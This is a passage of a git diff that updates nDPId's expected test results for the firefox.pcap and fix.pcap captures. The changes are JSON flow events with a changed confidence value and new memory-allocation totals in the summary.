+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":5441,"packets-processed":5441,"total-skipped-flows":0,"total-l4-payload-len":4593506,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620927999948} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5441/5441 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6044988 bytes -~~ total memory freed........: 6044988 bytes -~~ total allocations/frees...: 123593/123593 +~~ total memory allocated....: 6178622 bytes +~~ total memory freed........: 6178622 bytes +~~ total allocations/frees...: 126355/126355 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 921 chars diff --git a/test/results/fix.pcap.out b/test/results/fix.pcap.out index ef3e59c12..107868cd6 100644 --- a/test/results/fix.pcap.out +++ b/test/results/fix.pcap.out @@ -2,76 +2,76 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1493755109242} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 